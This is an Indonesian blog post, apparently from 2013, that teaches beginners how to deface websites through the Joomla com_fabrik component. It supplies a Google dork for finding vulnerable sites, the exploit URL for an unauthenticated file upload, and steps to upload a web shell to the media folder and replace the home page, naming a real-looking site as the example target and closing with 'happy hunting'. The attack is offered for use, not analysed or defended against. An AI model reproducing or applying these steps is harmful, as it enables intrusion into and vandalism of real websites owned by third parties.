• Untuk para master, dedengkot, mbahnya hacker khususnya defacer, pasti sudah tidak asing lagi Exploit com_fabrik. Namun untuk newbie seperti ane pasti masih clingak-clinguk. Maka dari itu ane mau berbagi sesuatu bagi yang belom tau :)



    Oke, untuk yang belum tahu disimak ya :)

    Dork :
    inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)

    Exploit :
    index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher


    Langkah2nya :
    Buka mbah google.com
    Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
    Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
    Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
    [Image: 3_zps5c343d96.jpg]
    maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
    Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
    [Image: 4_zps8cde2690.jpg]
    seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
    [Image: 5_zpsfe8fbe56.jpg]
    dan taraaaaaaaa berhasil :)


    Mudah banget kan??? :)
    Oke, selamat berburu....
    [/b]

    0 comments

  • Copyright © 2013 - Nisekoi - All Right Reserved

    X ZoneTechno Powered by Blogger - Designed by Johanes Djogan